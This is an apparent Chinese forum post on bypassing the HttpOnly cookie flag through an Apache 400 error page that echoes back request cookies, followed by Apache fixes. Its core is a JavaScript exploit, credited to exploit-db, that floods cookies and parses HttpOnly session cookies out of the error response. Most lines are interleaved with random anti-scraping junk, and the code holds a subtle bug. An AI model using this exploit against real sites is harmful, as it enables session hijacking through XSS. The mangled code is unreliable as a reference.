很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
: O+ E) K& | ^- ~8 ?+ \& a
0 Q* l% ^* V5 H/ z3 O# X7 }用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
0 m( ~$ T1 z) R5 c6 F. i* Y" t
7 U" C" f# A% p: k' H9 r- q) Q- ?: {2 s4 |. w
// http://www.exploit-db.com/exploits/18442/
+ H4 r* q1 x1 T- T: ffunction setCookies (good) {
& @- z0 J( n2 a+ P& U// Construct string for cookie value' y5 F6 f- U8 P# C5 q# H
var str = "";
& e( A7 ?( G" R0 [, gfor (var i=0; i< 819; i++) {: ^2 k& U# y1 }' E
str += "x";
/ U6 f3 |1 k+ d$ n}& n' x, Q1 H) J% @2 z1 z
// Set cookies
2 W- B) ]9 a& C: E9 ^8 b) ffor (i = 0; i < 10; i++) {
8 p8 j. ?4 C/ P7 M// Expire evil cookie2 T% T+ p, [6 U+ C' E$ t: r
if (good) {. {: D, T y$ ^1 E% T9 w4 l
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
, d2 h2 o0 S- m m}7 B1 [! N/ ?% T! ^# p$ k9 _
// Set evil cookie
. A+ n3 L( o2 }8 B( Uelse {
6 ^ p8 v/ @& t, cvar cookie = "xss"+i+"="+str+";path=/";
5 b- _$ c S+ [" T}
: s& o z! v5 B& t0 kdocument.cookie = cookie;8 ~! z! v1 m# L) n4 c7 D
}- V* [6 w8 O# D t- w# v! ]. J# K% x
}; X4 ?3 x2 s8 s( n( B
function makeRequest() {5 a) f, Q, ^; n' q+ f Z
setCookies();
$ E0 k/ T2 e7 x" q% P1 `0 V3 Tfunction parseCookies () {
# m: ~: Z6 d/ x* O+ cvar cookie_dict = {};
% l& u, D5 {7 n8 X// Only react on 400 status
6 i9 _) X( T& a. C/ tif (xhr.readyState === 4 && xhr.status === 400) {
" `, i4 l: n$ O6 w: W// Replace newlines and match <pre> content* r a- u4 z; V, B
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
" _1 s- x+ z3 `) G; w- b3 C Hif (content.length) {: w7 V2 M; ^6 q3 [5 I; T
// Remove Cookie: prefix8 x4 Y7 ^- R/ q3 \0 f8 ]
content = content[1].replace("Cookie: ", "");
g# r4 K R2 U- t; Bvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
4 L2 i* O# ?* j: [4 A7 m// Add cookies to object
8 \: O, l3 U; Z( H7 `for (var i=0; i<cookies.length; i++) {% _9 _6 |" X1 M' c- X$ G
var s_c = cookies.split('=',2);
/ [8 _, S7 K4 i! L' m+ b& {cookie_dict[s_c[0]] = s_c[1];
& G) i& _" W( `1 {' M, @( A, m/ }}$ y2 z, _5 q4 T5 P$ ~3 x
}
6 @1 }! q3 @4 W0 y% N6 T// Unset malicious cookies
8 b: p0 F2 o6 ]5 s4 UsetCookies(true);
2 n' m9 }, s0 palert(JSON.stringify(cookie_dict));
8 T/ C* L: W: s# a$ [}
5 S6 b6 r8 p' Z% l% I}
. q8 R/ A4 b9 B0 i" z e// Make XHR request0 g. C( [$ o$ f5 ~
var xhr = new XMLHttpRequest();
1 }- g0 _* Y/ K) h: Y( lxhr.onreadystatechange = parseCookies;
8 }& `! D; d2 A9 X3 Mxhr.open("GET", "/", true);
& D( `( X* q' ?3 Z* Kxhr.send(null);0 h. c# Y2 ~& W3 ^ n, S; k
}
2 J9 F |( o ]) N! ~1 cmakeRequest();
# d. v/ z: c" r0 p, D! ` r
3 L* x1 Y: d+ B% s; @你就能看见华丽丽的400错误包含着cookie信息。6 ~& C5 v5 t+ A- H7 @4 c
6 _. O# Z- V+ o下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#( o1 @% b: O; {. Q6 D8 Z8 D K& \$ T
) ^; j7 Q! i0 m2 l9 z修复方案:+ h7 M8 i* ~; W* c" M* V; L
7 e& u Q# @5 c$ T J. @2 YApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
2 }2 d) a' H' U
* E& ^( N$ ?- V4 _9 qIn the event of a problem or error, Apachecan be configured to do one of four things,
7 J3 [2 v% ^' Q
5 K; y7 l- `2 o4 M/ N* r% D+ b; H0 G3 M1. output asimple hardcoded error message输出一个简单生硬的错误代码信息6 d5 i: ?0 \" h8 o; z
2. output acustomized message输出一段信息
) T k# X; ?# J) V6 s3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
- {5 ]! ~& f+ w1 R/ J4. redirect to an external URL to handle theproblem/error转向一个外部URL
" Q& i( ?" Y4 ^$ K, M# c; r. b0 ?; e% b4 _7 g
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容& }; o3 u6 ~' d/ i
' ]% ~+ Q! }7 w$ d* LApache配置:
: o) Y: m$ E4 Q, n& K7 t
& h9 c9 d# g2 A( A* CErrorDocument400 " security test"
. w I* b/ F' i- W( l& r! ^' P" {+ r
当然,升级apache到最新也可:)。) ]# K% p) d' n5 ~& v" X% d
/ ]: e$ u8 u4 B6 L9 r参考:http://httpd.apache.org/security/vulnerabilities_22.html, V3 `: R, F+ P$ R$ ?* w, X
# S* o5 {6 a* R" }" w5 l |